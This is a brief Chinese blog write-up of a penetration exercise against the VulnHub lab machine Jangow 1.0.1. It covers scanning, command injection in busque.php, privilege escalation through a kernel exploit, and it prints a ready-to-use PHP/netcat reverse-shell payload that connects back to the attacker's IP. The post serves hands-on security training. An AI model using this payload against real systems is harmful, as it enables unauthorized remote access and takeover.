渗透实战(三)

近期比较忙,一直在打CTF,所以博客写的比较简略,各位师傅看看思路就行,有些地方也没写到,不必太在意。

下载地址:https://www.vulnhub.com/entry/jangow-101,754/

攻击机192.168.159.4

靶机192.158.159.5

1.扫描IP地址,得到靶机的IP

arp-scan -l

 2.得到靶机的ip,扫描其端口信息

nmap -A 192.168.159.5

 3.发现80端口还开着http,去浏览器打开

 尝试几次后发现一个可能存在漏洞的地方

 4.尝试输入uname -a 发现可以

5.因此直接在后面写一句话木马

http://192.168.159.5/site/busque.php?buscar=<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.159.4 443 >/tmp/f");?>

 可以看到已经写进去了(端口多试几个,很多常用的都被关了)

6.打开监听端口

nc -lvp 443

7.前端访问shell.php文件,实现反弹shell

8.成功获得权限,查看本机信息和系统版本

 lsb_release-a

9.查看这一版本所存在的漏洞并下载

 Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers

 10.使用蚁剑进行上传

 11.下载漏洞并执行

 12.成功提权

 

posted @ 2024-11-12 09:50  XFocus666  阅读(3)  评论(0编辑  收藏  举报  来源